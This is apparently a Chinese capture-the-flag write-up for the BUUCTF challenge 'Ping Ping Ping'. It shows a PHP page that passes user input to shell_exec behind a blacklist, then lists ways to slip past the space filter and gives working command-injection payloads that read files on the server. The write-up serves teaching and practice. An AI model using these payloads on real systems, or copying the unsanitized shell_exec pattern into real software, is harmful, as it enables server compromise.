BUUCTF-(GXYCTF2019)Ping Ping Ping

KAKSKY / 2023-08-30 / 原文

?php
if(isset($_GET['ip'])){
  $ip = $_GET['ip'];
  if(preg_match("/\&|\/|\?|\*|\<|[\x{00}-\x{1f}]|\|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match)){
    echo preg_match("/\&|\/|\?|\*|\<|[\x{00}-\x{20}]|\>|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match);
    die("fxck your symbol!");
  } else if(preg_match("/ /", $ip)){
    die("fxck your space!");
  } else if(preg_match("/bash/", $ip)){
    die("fxck your bash!");
  } else if(preg_match("/.*f.*l.*a.*g.*/", $ip)){
    die("fxck your flag!");
  }
  $a = shell_exec("ping -c 4 ".$ip);
  echo "
";
  print_r($a);
}

它过滤了很多的字符，所有在命令执行的时候就需要绕过这些检测方式，这也是值得学习的点。

首先就是绕过空格的方法：

${IFS}
$IFS$1
${IFS
%20
<		//用重定向符替换空格
<>
%09
{cat,flag.php}	//用逗号实现空格功能

备注：在Linux中cat${IFS}flag.php和空格类似，感觉有点是${IFS}替换了空格；IFS默认值是空格、制表符和换行符，IFS可以认为是Linux中的一个全局变量

这个题目中的变量$a可以利用，但仅限于这题！

?ip=127.0.0.1;a=g;cat$IFS$1index.php

方法二：

?ip=127.0.0.1;cat$IFS$9`ls`

ls的结果当成cat的参数

BUUCTF-(GXYCTF2019)Ping Ping Ping更多相关文章

09-XSS键盘监听、cookie窃取&文件上传绕过

web集群项目-迁移与接入负载

给 WordPress 添加文章浏览量统计功能

RTX5/FreeRTOS全家桶源码工程综合实战模板集成CANopen组件（2024-10-30）

【PHP爬虫的淘宝奇遇记】—— 探索商品类目的“迷宫”

冒险岛V0.79版本单机安装教程_无需虚拟机

微信支付沙箱测试

W1R3S 1.0.1

集合竞价逐笔数据,level2行情接口统计验证

随机推荐

NOIP2024模拟赛20 & 11.1 小记

20241101 数据结构与算法期中机试收获

Java，启动！

什么是IT技术

即将到来！

2024/11/1日日志关于JavaScript简介&引入方式以及基础语法的学习

舍得-时间-工作是人的一生最重要的事情-自己要有私房钱-人的一生最重要的事情是书写自己的人生

2.TiUP 部署 DM 集群

原型模式的C++实现

python bytecode解析

09-XSS键盘监听、cookie窃取&文件上传绕过

ubuntu 24.04 部署 mysql 8.4.3 LTS

国标GB28181公网平台LiteGBS国标GB28181视频平台建筑工地无线视频联网监控系统方案

imes完工下线

android 13 更改手机信号调整

BFS(Breath First Search 广度优先搜索)

Visual Studio Code（VSCode）中设置中文界面

影响黄金价格大幅波动的因素主要有哪些？

winform用Dev的TreeList滚动到指定节点的位置

Angular 18 上手开发

BUUCTF-(GXYCTF2019)Ping Ping Ping

BUUCTF-(GXYCTF2019)Ping Ping Ping更多相关文章

随机推荐

热门话题